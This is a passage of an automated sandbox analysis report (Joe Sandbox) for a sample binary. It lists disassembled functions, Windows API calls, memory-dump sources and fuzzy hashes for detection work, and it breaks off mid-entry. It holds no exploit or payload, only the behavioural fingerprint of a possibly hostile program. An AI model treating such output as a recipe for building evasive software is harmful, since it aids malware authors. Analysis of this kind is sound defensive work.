Part of subcall function 0040A460: HeapAlloc.KERNEL32(00000000,0000003C,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040A47F
Part of subcall function 0040A460: HeapAlloc.KERNEL32(00000008,00000015,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040A4A5
Part of subcall function 0040A460: HeapAlloc.KERNEL32(00000008,FFFFFFED,FFFFFFED,00000010,00010000,00000004,00000200,?,?,?,?,004010C3,00000004,00000015,00000000,00000200), ref: 0040A502

Part of subcall function 0040AA5A: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000), ref: 0040AA98
Part of subcall function 0040AA5A: HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000), ref: 0040AAB1
Part of subcall function 0040AA5A: HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000), ref: 0040AABB

Part of subcall function 0040A9C8: HeapAlloc.KERNEL32(00000000,00000034,?,?,?,004010E9,00000008,00000000,0041706C,00000007,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A9DB
Part of subcall function 0040A9C8: HeapAlloc.KERNEL32(FFFFFFF5,00000008,?,?,?,004010E9,00000008,00000000,0041706C,00000007,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A9F0

Part of subcall function 0040E266: RtlAllocateHeap.NTDLL(00000000,FFFFFFDD,?,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00417074,004180F0,00000004,00000000,00417064), ref: 0040E296
Part of subcall function 0040E266: memset.MSVCRT ref: 0040E2D1

SetConsoleCtrlHandler.KERNEL32(00000000,00000001,00000004,00000000,00417064,00000008,0000000C,000186A1,00000007,00417074,004180F0,00000004,00000000,00417064,00000008,00000008), ref: 0040116F

Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B

Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(00980000,00000000,?), ref: 0040E599

Part of subcall function 00401BA0: LoadLibraryExW.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040119C,004180A0,00000000), ref: 00401BDE
Part of subcall function 00401BA0: EnumResourceTypesW.KERNEL32(00000000,00000000,00000000), ref: 00401BFB
Part of subcall function 00401BA0: FreeLibrary.KERNEL32(?,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040119C,004180A0), ref: 00401C03

HeapDestroy.KERNEL32(00000000,004180A0,00000000,00000000,00000000,00000001,00000004,00000000,00417064,00000008,0000000C,000186A1,00000007,00417074,004180F0,00000004), ref: 004011C6
ExitProcess.KERNEL32(00000000,004180A0,00000000,00000000,00000000,00000001,00000004,00000000,00417064,00000008,0000000C,000186A1,00000007,00417074,004180F0,00000004), ref: 004011CB

Strings

.pA, xrefs: 00401085
|pA, xrefs: 00401044
:pA, xrefs: 0040112D

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: Heap$Alloc$Free$CreateInitializememset$AllocateCriticalErrorHandleLastLibrarySectionValue$CommonConsoleControlsCtrlDestroyEnumExitHandlerInitLoadModuleProcessResourceTypes
String ID: .pA$:pA$|pA
API String ID: 1832782000-3272395972
Opcode ID: e7f32bf2566b166e90da22a76ab727083cf26bbbb94d3fc8ba97ce05dc44ab59
Instruction ID: c3718d3f77f1aa7f822ccfb4f0aafd009571b65037601bc21910cdbb085b96b1
Opcode Fuzzy Hash: e7f32bf2566b166e90da22a76ab727083cf26bbbb94d3fc8ba97ce05dc44ab59
Instruction Fuzzy Hash: 77313271680704A9E200B7B39C47F9E3A18AB1874CF11883FB744790E3DEBC55584A6F

Function 0040B140 Relevance: 9.2, APIs: 6, Instructions: 157
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,?,?,00000000,00000000), ref: 0040B1B1
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,?,?,?,00000000,00000000), ref: 0040B1F2
CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00000000,00000000), ref: 0040B23C
CreateFileW.KERNEL32(?,40000000,?,00000000,00000005,00000000,00000000,?,?,?,00000000,00000000), ref: 0040B25E
HeapAlloc.KERNEL32(00000000,00001000,?,?,?,?,00000000,00000000), ref: 0040B297
SetFilePointer.KERNEL32(?,00000000,?,00000002), ref: 0040B2EA

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: File$Create$AllocHeapPointer
String ID:
API String ID: 4207849991-0
Opcode ID: 1dd6c58127759367adb822d4a0e0d9138a9c495b34507b1400e0ba0402d2ad51
Instruction ID: 8d8b4ccba24edc48a090e0818cc57ca2d498b7de68d829e88f81714118269cc7
Opcode Fuzzy Hash: 1dd6c58127759367adb822d4a0e0d9138a9c495b34507b1400e0ba0402d2ad51
Instruction Fuzzy Hash: D251B171244301ABE3208E15DC49B6BBAE5EB44764F24493EFD81A63E0D779E8458B8D

Function 0040DE99 Relevance: 7.6, APIs: 5, Instructions: 106
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32(00418684,0041867C,0040E062,00000000,FFFFFFED,00000200,77355E70,0040A4F6,FFFFFFED,00000010,00010000,00000004,00000200), ref: 0040DEDA
HeapAlloc.KERNEL32(00000000,00000018,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040DF11
LeaveCriticalSection.KERNEL32(00418684,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040DF6A
RtlAllocateHeap.NTDLL(00000000,00000038,00000000,FFFFFFED,00000200,77355E70,0040A4F6,FFFFFFED,00000010,00010000,00000004,00000200), ref: 0040DF7B
InitializeCriticalSection.KERNEL32(00000020,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040DFB7

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: CriticalSection$Heap$AllocAllocateEnterInitializeLeave
String ID:
API String ID: 1272335518-0
Opcode ID: d472077d75a53df2d0dde7d61b18959a765d34bb65c31e97d0a70733ac938e24
Instruction ID: e12e1174ac54fca87ec7e67201d5359a366fc17122bfc308660e030bf91fb77e
Opcode Fuzzy Hash: d472077d75a53df2d0dde7d61b18959a765d34bb65c31e97d0a70733ac938e24
Instruction Fuzzy Hash: 90318D71940B069BC3208F95D844A52FBF0FB44720B19C93EE446A77A0DB78E908CB99

Function 00403F53 Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 571
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(00980000,00000000,?), ref: 0040E599

Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B

Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7

Part of subcall function 0040E560: RtlReAllocateHeap.NTDLL(00980000,00000000,?,?), ref: 0040E5BC

GetModuleHandleW.KERNEL32(00000000,?,?,?,00000000,00000000,?,00989768,00000000,00000000), ref: 0040445B
PathRemoveBackslashW.SHLWAPI(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00404554

Part of subcall function 00402BA6: GetShortPathNameW.KERNEL32(00989768,00989768,00002710), ref: 00402BE0

Part of subcall function 0040E720: TlsGetValue.KERNEL32(0000000D,?,?,00401DDF,00000000,00000000,00000000,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000), ref: 0040E72A

Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402F8A,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189

Part of subcall function 004099A5: SetEnvironmentVariableW.KERNELBASE(00989768,00989768,00404594,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004099BE

Part of subcall function 00401E66: PathQuoteSpacesW.SHLWAPI(?,00000000,00000000,00000000,00000000,00000000,00000000,-00000004,004045DB,00000000,00000000,00000000,00989768,00988DC0,00000000,00000000), ref: 00401E9B

SetConsoleCtrlHandler.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00989768,00988DC0,00000000,00000000,00000000), ref: 00404636

Part of subcall function 0040548C: CreateThread.KERNEL32(00000000,00001000,?,?,00000000,00989768), ref: 004054A5
Part of subcall function 0040548C: EnterCriticalSection.KERNEL32(00418708,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054B7
Part of subcall function 0040548C: WaitForSingleObject.KERNEL32(00000008,00000000,00000000,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000), ref: 004054CE
Part of subcall function 0040548C: CloseHandle.KERNEL32(00000008,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054DA
Part of subcall function 0040548C: LeaveCriticalSection.KERNEL32(00418708,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 0040551D

Strings

pA, xrefs: 00404275

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: Value$Path$AllocateCriticalErrorHandleHeapLastSection$BackslashCloseConsoleCreateCtrlEnterEnvironmentHandlerLeaveModuleNameObjectQuoteRemoveShortSingleSpacesThreadVariableWaitwcslen
String ID: pA
API String ID: 2577741277-3402996844
Opcode ID: 02fc4b5e4cf3e2b062acb6fd4e75bc4e4b77abc282d734037bd608deb4f56764
Instruction ID: 999f5745f1e250978be3a13d4136388ffeb6a971fca5c6bbec0ef146a0a58392
Opcode Fuzzy Hash: 02fc4b5e4cf3e2b062acb6fd4e75bc4e4b77abc282d734037bd608deb4f56764
Instruction Fuzzy Hash: 4712FAB5504304BED600BBB29C8197F77BCEB89718F10CC3FB544A6192EA3CD9559B2A

Function 00403C83 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 128
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040E660: TlsGetValue.KERNEL32(0000000D,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000,00000001,00000004,00000000,00417064), ref: 0040E677

Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B

Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7

Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(00980000,00000000,?), ref: 0040E599

PathQuoteSpacesW.SHLWAPI(00000000,00000000,00988E40,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00404626,00000000,00000000,00000000,?), ref: 00403CE6

Part of subcall function 0040E560: RtlReAllocateHeap.NTDLL(00980000,00000000,?,?), ref: 0040E5BC

PathQuoteSpacesW.SHLWAPI(?,00000000,00000000,0041702A,00000000,00000000,00000000,00000000,00988E40,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403D1F

Part of subcall function 0040AE75: GetCurrentDirectoryW.KERNEL32(00000104,00000000,00000104,00000000,?,?,0000000A,004037B6,00000000,00000000,00000000,?,00000000,00000000,00000000,00404746), ref: 0040AE8B

Part of subcall function 0040E720: TlsGetValue.KERNEL32(0000000D,?,?,00401DDF,00000000,00000000,00000000,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000), ref: 0040E72A

Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402F8A,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189

Part of subcall function 004098F7: WaitForSingleObject.KERNEL32(00989768,00000000,?,?,?,00403DC7,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044), ref: 00409904
Part of subcall function 004098F7: PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,00989768,00000000,?,?,?,00403DC7,?,00000000,00000000,00000000,0041702A,?), ref: 00409921

Part of subcall function 004056D8: timeBeginPeriod.WINMM(00000001,00403793,00000001,?,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,00000000,00404746,00000000,00000000), ref: 004056E3

Strings

*pA, xrefs: 00403CFD
*pA, xrefs: 00403D5D

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: Value$AllocateErrorHeapLastPathQuoteSpaces$BeginCurrentDirectoryNamedObjectPeekPeriodPipeSingleWaittimewcslen
String ID: *pA$*pA
API String ID: 2955313036-2893952571
Opcode ID: 84abd70bc118c43edac4cdddf4176e4a5970b13bb6e4d92b3572f02cd89cd0cc
Instruction ID: 17d0f5624b42dd18ceef5440812bdbba4c8a787aaabb2d2d00a5c22853b10036
Opcode Fuzzy Hash: 84abd70bc118c43edac4cdddf4176e4a5970b13bb6e4d92b3572f02cd89cd0cc
Instruction Fuzzy Hash: 4E41D875104205AAC600BF73DC8293F7669EFD4708F50CD3EB184361E2EA3D9D25AB6A

Function 00401BA0 Relevance: 4.7, APIs: 3, Instructions: 233
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040E660: TlsGetValue.KERNEL32(0000000D,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000,00000001,00000004,00000000,00417064), ref: 0040E677

Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B

Part of subcall function 00409698: GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000000,?,?,?,00401BD6,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 004096B4
Part of subcall function 00409698: wcscmp.MSVCRT ref: 004096C2
Part of subcall function 00409698: memmove.MSVCRT(00000000,00000008,\\?\,?,?,?,00401BD6,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000), ref: 004096DA

Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402F8A,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189

LoadLibraryExW.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040119C,004180A0,00000000), ref: 00401BDE
EnumResourceTypesW.KERNEL32(00000000,00000000,00000000), ref: 00401BFB
FreeLibrary.KERNEL32(?,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040119C,004180A0), ref: 00401C03

Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7

Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(00980000,00000000,?), ref: 0040E599

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: Value$ErrorLastLibrary$AllocateEnumFileFreeHeapLoadModuleNameResourceTypesmemmovewcscmpwcslen
String ID:
API String ID: 983379767-0
Opcode ID: 1013e86ad0ddabd5bdbaebac76a0aba0293512a478a38395633b6e37ec251e0a
Instruction ID: 6d1e308804f6dc32779c3279b2fcfe03024d17212ecc119a6d6b7423f9e5f936
Opcode Fuzzy Hash: 1013e86ad0ddabd5bdbaebac76a0aba0293512a478a38395633b6e37ec251e0a
Instruction Fuzzy Hash: C951D7B66052007AE500BBB39D82D7F626DDBC571CB108C3FB440650E3EA3D9D616A6E

Function 0040B6A0 Relevance: 4.6, APIs: 3, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointer.KERNELBASE(?,?,?,00000001), ref: 0040B6D8
memcpy.MSVCRT(?,?,?,?,00000001), ref: 0040B712

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: FilePointermemcpy
String ID:
API String ID: 1104741977-0
Opcode ID: 02d62d909d0369cf033ef3da9330b5dd6b1d06cd86180aa2b8ba7b2c57c5f325
Instruction ID: c1513f54f6ae5569788c36180188ddc2abd705510cfe10eedfb0010ba837d0d9
Opcode Fuzzy Hash: 02d62d909d0369cf033ef3da9330b5dd6b1d06cd86180aa2b8ba7b2c57c5f325
Instruction Fuzzy Hash: DA312A3A2047019FC320DF29D844E9BB7E5EFD8714F04882EE59A97750D335E919CBAA

Function 0040E560 Relevance: 4.6, APIs: 3, Instructions: 53
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
RtlAllocateHeap.NTDLL(00980000,00000000,?), ref: 0040E599
RtlReAllocateHeap.NTDLL(00980000,00000000,?,?), ref: 0040E5BC

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: AllocateHeap$Value
String ID:
API String ID: 2497967046-0
Opcode ID: 3c4de4927df5d1280fe3f97ef1b5d41f3313172c187ce59835a5c327154ebcf4
Instruction ID: 56fdceb44a62e96a78129ec9cee9786d08dacee7710f0624d62ab86a2b9feb41
Opcode Fuzzy Hash: 3c4de4927df5d1280fe3f97ef1b5d41f3313172c187ce59835a5c327154ebcf4
Instruction Fuzzy Hash: 6011E974600208FFCB04CF99D894E9ABBB6FF88314F20C569E8099B354D734AA41DB94

Function 0040AD45 Relevance: 4.5, APIs: 3, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcsncpy.MSVCRT ref: 0040AD63
wcslen.MSVCRT ref: 0040AD75
CreateDirectoryW.KERNELBASE(?,00000000), ref: 0040ADB5

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: CreateDirectorywcslenwcsncpy
String ID:
API String ID: 961886536-0
Opcode ID: d6c445466f8a19e48a25e4a2068d10de2bbe29753fac2d082d2e760440aa5e2b
Instruction ID: 2d24f661812d06aabf4acf2af4a599dd38efaf3f9e777f7594d650cf82d0c1de
Opcode Fuzzy Hash: d6c445466f8a19e48a25e4a2068d10de2bbe29753fac2d082d2e760440aa5e2b
Instruction Fuzzy Hash: 9A01DBB0401318D6CB65DB64CC89AFE7379DF04301F6046BBE815E25D1E7389AA4DB4A

Function 00408DEE Relevance: 4.5, APIs: 3, Instructions: 20
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00408DFB
InitCommonControlsEx.COMCTL32(00000008,00001000), ref: 00408E15
CoInitialize.OLE32(00000000), ref: 00408E1D

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: CommonControlsInitInitializememset
String ID:
API String ID: 2179856907-0
Opcode ID: d861f93e929e8b2be3fa0307ea6de5ff81dc4c61bc6e7fbf8c72a90690fa8d51
Instruction ID: 955719fea0046c6293a44e32614ed026eb147d3324017d94785fb64326744d49
Opcode Fuzzy Hash: d861f93e929e8b2be3fa0307ea6de5ff81dc4c61bc6e7fbf8c72a90690fa8d51
Instruction Fuzzy Hash: FDE08CB088430CBBEB009BD0EC0EF8DBB7CEB00315F4041A4F904A2280EBB466488B95

Function 004099A5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEnvironmentVariableW.KERNELBASE(00989768,00989768,00404594,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004099BE

Strings

$0A, xrefs: 004099B4

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: EnvironmentVariable
String ID: $0A
API String ID: 1431749950-513306843
Opcode ID: c92aad9fdd5c3c8ab1daeb637eb2d23f1451a042da96c25929af1641449dc86f
Instruction ID: aa531fc2ff4271b490b4da26c39a2883f909eecf40e951fe565ba9eea3f0378e
Opcode Fuzzy Hash: c92aad9fdd5c3c8ab1daeb637eb2d23f1451a042da96c25929af1641449dc86f
Instruction Fuzzy Hash: 36C012B0204201ABD710CA04CD04B67BBE4EB50345F00C43EB184913B1C338CC40DB05

Function 0040B440 Relevance: 3.1, APIs: 2, Instructions: 65
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040DB18: EnterCriticalSection.KERNEL32(00000020,00000000,?,00000000,0040B455,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?,00000000), ref: 0040DB23
Part of subcall function 0040DB18: LeaveCriticalSection.KERNEL32(00000020,?,00000000,0040B455,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0040DB9E

CreateFileW.KERNELBASE(00000000,80000000,00000000,00000000,00000003,00000080,00000000,?,00000000,?,?,00000000,00403350,00000000,00000000,00000000), ref: 0040B473
HeapAlloc.KERNEL32(00000000,00001000,?,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?,00000000,00000000,00000800), ref: 0040B495

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: CriticalSection$AllocCreateEnterFileHeapLeave
String ID:
API String ID: 3705299215-0
